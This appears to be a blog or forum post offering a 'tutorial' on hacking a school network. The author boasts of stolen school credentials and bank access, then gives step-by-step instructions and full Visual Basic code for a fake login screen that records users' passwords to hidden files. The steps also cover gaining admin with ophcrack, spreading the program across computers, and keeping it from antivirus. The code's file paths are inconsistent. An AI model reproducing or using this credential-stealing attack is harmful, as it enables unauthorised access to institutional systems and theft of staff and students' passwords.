A Li’l tutorial on School Hacking

Before I begin I want to give a little background... So I personally at school have access to the school bank accounts, the ability to change ANYTHING on the schools 2008 R2 server, 42 passwords / Usernames, and 30 recorded VoIP clips of school administration talking about how to fix the school problems... So if any of you have doubt I do know this works. Pinch

This is for anyone who knows visual basic...


First, make a log in screen that looks like the ones they use at your school in the form.
This looks like the one they use at my school, I agree with the boring part too lol...

Second, find the file they keep at your school that looks like the background and save it somewhere safe.


Third, create a password / log in that looks convincing and add in this code to your button .click event:

 

If Me.TextBox1.Text = Nothing Or Me.TextBox2.Text = Nothing Then
            MsgBox("Please enter a valid username and password.")
        Else
            Dim Readit As String = System.IO.File.ReadAllText("c:\Windows\System32\Username.txt")
            System.IO.File.WriteAllText("c:\Windows\System32\eject\Username.txt", Readit & Me.TextBox1.Text)
            Readit = System.IO.File.ReadAllText("c:\Windows\System32\eject\Password.txt")
            System.IO.File.WriteAllText("c:\Windows\System32\eject\Password.txt", Readit & Me.TextBox2.Text)
            Application.Exit()
            Dim shell
            shell = CreateObject("wscript.shell")
            shell.run("c:\windows\system32\logoff.exe")
            shell = Nothing
        End If

Fourth, tweek to your willing and turn the background to the one I told you to find earlier... and turn it into an exe.


Five, use the latter ophcrack entry to get admin and log onto it...


Six, copy the program from a flash drive and paste and execute it.


Seven, repeat across multiple computers, this will log off the admin, create 2 txt files with the user names and passwords. But it will create a WTF effect because the person logging in has to log in again...


Eight, check C:\WINDOWS\System32 for these two files %root%\Username.txt and %root%\Password.txt files... the passwords and usernames are in these files...

P.S. The anti virus may try and delete this so keep the .sln so you can execute that instead if needed, anti virus doesn't scan the .sln code.

0 comments: